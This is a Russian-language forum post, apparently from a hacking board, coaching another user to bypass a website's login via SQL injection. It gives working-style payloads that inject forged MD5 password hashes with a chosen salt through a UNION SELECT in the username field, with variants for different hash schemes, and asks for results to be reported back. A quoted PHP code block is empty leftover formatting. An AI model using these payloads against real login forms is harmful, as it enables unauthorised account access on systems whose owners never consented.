Сообщение от
M1lten
Тоже, ошибки нет, но пишет что не правильный пароль.
Если что, могу кому-то в пм кинуть
Ну тогда примерно понятно, чо.
Знач так. Тащемта возмем за основу:
asd' union select 'pass', 'salt', 1, '1
/via кто-то там
Значит там сравнивается с пассом который ты шлешь. да.
Отсылать на скрипт будем пароль: "1"(без кавычек естественно)
думаю что выглядет в коде это как-то так:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
Наш пароль: 1
"Наша" соль: 2
При авторизации пробуй слать:
Код:
Логин: asd' and 1=2 union select MD5(CONCAT(MD5(1), 2)) , 2, 1, 1 --
Пасс: 1
Или
Код:
//md5(md5(pass).md5(salt))
Логин: asd' and 1=2 union select MD5(CONCAT(MD5(1), MD5(2))) , 2, 1, 1 --
Пасс: 1
И так далее по алгоритмам.
Отчет ждем в тему